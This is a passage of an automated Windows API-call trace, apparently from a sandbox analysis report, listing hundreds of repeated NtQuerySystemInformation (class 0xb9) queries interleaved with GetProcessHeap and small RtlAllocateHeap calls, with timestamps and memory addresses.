NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.693] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.693] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.693] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.693] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.693] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.693] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.693] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc48, Length=0x30, ResultLength=0x0) [0233.693] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb78, Length=0x30, ResultLength=0x0) [0233.694] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffda00, Length=0x20, ResultLength=0x0) [0233.694] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd9b0, Length=0x20, ResultLength=0x0) [0233.694] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd960, Length=0x20, ResultLength=0x0) [0233.694] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.694] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.694] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.694] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.694] GetProcessHeap () returned 0x269489b0000 [0233.694] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x0, Size=0x2e) returned 0x26948a54d10 [0233.695] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.695] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.695] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.695] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdad0, Length=0x20, ResultLength=0x0) [0233.695] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.695] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.695] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb78, Length=0x30, ResultLength=0x0) [0233.695] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.695] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.695] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.696] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.696] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.696] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.696] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.696] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.696] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.696] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc48, Length=0x30, ResultLength=0x0) [0233.696] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb78, Length=0x30, ResultLength=0x0) [0233.696] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffda00, Length=0x20, ResultLength=0x0) [0233.696] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd9b0, Length=0x20, ResultLength=0x0) [0233.696] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd960, Length=0x20, ResultLength=0x0) [0233.697] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.697] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.697] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.697] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.697] GetProcessHeap () returned 0x269489b0000 [0233.697] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x0, Size=0x5c) returned 0x26949596c60 [0233.697] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.697] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.698] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.698] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdad0, Length=0x20, ResultLength=0x0) [0233.698] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.698] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.698] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb78, Length=0x30, ResultLength=0x0) [0233.698] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.698] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.698] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.698] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.698] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.699] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.699] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.699] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.699] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.699] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.699] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.699] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.699] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.700] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.700] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.700] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.700] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.700] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.700] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.701] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc48, Length=0x30, ResultLength=0x0) [0233.701] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb78, Length=0x30, ResultLength=0x0) [0233.701] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffda00, Length=0x20, ResultLength=0x0) [0233.701] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd9b0, Length=0x20, ResultLength=0x0) [0233.701] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd960, Length=0x20, ResultLength=0x0) [0233.701] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.701] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.701] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.701] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.701] GetProcessHeap () returned 0x269489b0000 [0233.701] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x0, Size=0x22) returned 0x26948a4ecb0 [0233.702] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.702] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.702] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.702] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdad0, Length=0x20, ResultLength=0x0) [0233.702] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.702] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.702] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb78, Length=0x30, ResultLength=0x0) [0233.702] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.702] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.702] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.703] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.703] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.703] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.703] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.703] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.703] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.703] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc48, Length=0x30, ResultLength=0x0) [0233.703] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb78, Length=0x30, ResultLength=0x0) [0233.704] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffda00, Length=0x20, ResultLength=0x0) [0233.704] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd9b0, Length=0x20, ResultLength=0x0) [0233.704] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.704] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.704] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.704] GetProcessHeap () returned 0x269489b0000 [0233.704] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x0, Size=0x6) returned 0x2694959daf0 [0233.705] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.705] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.705] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.705] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdad0, Length=0x20, ResultLength=0x0) [0233.705] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.705] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.705] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb78, Length=0x30, ResultLength=0x0) [0233.705] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.705] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.706] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.706] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.706] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.706] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.706] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.706] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.707] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.707] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.707] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.707] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.707] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.707] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.707] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc48, Length=0x30, ResultLength=0x0) [0233.708] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb78, Length=0x30, ResultLength=0x0) [0233.708] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.708] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.708] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc48, Length=0x30, ResultLength=0x0) [0233.708] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb78, Length=0x30, ResultLength=0x0) [0233.708] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffda00, Length=0x20, ResultLength=0x0) [0233.708] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd9b0, Length=0x20, ResultLength=0x0) [0233.709] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd960, Length=0x20, ResultLength=0x0) [0233.709] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.709] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.709] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.709] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.710] GetProcessHeap () returned 0x269489b0000 [0233.710] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x0, Size=0x76) returned 0x26948a41df0 [0233.710] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.710] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.710] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.710] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdad0, Length=0x20, ResultLength=0x0) [0233.711] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.711] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.711] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb78, Length=0x30, ResultLength=0x0) [0233.711] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.711] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.711] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.711] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.711] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.712] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.712] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.712] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.712] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.712] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.712] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.713] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.713] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.713] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.713] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.713] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.713] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.713] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc48, Length=0x30, ResultLength=0x0) [0233.713] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb78, Length=0x30, ResultLength=0x0) [0233.714] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffda00, Length=0x20, ResultLength=0x0) [0233.714] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd9b0, Length=0x20, ResultLength=0x0) [0233.714] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.714] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.714] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.714] GetProcessHeap () returned 0x269489b0000 [0233.714] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x0, Size=0x18c) returned 0x26948a23590 [0233.715] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.715] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.715] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.715] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdad0, Length=0x20, ResultLength=0x0) [0233.715] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.715] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.715] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb78, Length=0x30, ResultLength=0x0) [0233.715] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.715] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.716] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.716] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.716] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.716] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.716] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.716] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.717] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.717] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.717] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.717] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.717] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.717] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.717] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.717] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc48, Length=0x30, ResultLength=0x0) [0233.718] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb78, Length=0x30, ResultLength=0x0) [0233.718] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffda00, Length=0x20, ResultLength=0x0) [0233.718] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd9b0, Length=0x20, ResultLength=0x0) [0233.718] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.718] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.718] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.718] GetProcessHeap () returned 0x269489b0000 [0233.718] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x0, Size=0x8) returned 0x2694959dc80 [0233.719] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.719] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.719] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.719] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdad0, Length=0x20, ResultLength=0x0) [0233.719] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.719] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.719] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb78, Length=0x30, ResultLength=0x0) [0233.719] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.719] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.720] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.720] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.720] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.720] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.720] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.720] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.720] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.720] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.721] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.721] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.721] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.721] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.721] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.721] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.721] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.721] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc48, Length=0x30, ResultLength=0x0) [0233.722] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb78, Length=0x30, ResultLength=0x0) [0233.722] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffda00, Length=0x20, ResultLength=0x0) [0233.722] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd9b0, Length=0x20, ResultLength=0x0) [0233.722] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.722] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.722] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.722] GetProcessHeap () returned 0x269489b0000 [0233.722] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x0, Size=0x1e0) returned 0x26948aa4590 [0233.723] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.723] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.723] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.723] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdad0, Length=0x20, ResultLength=0x0) [0233.723] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.723] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.723] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb78, Length=0x30, ResultLength=0x0) [0233.724] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.724] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.724] NtQuerySystemInformation 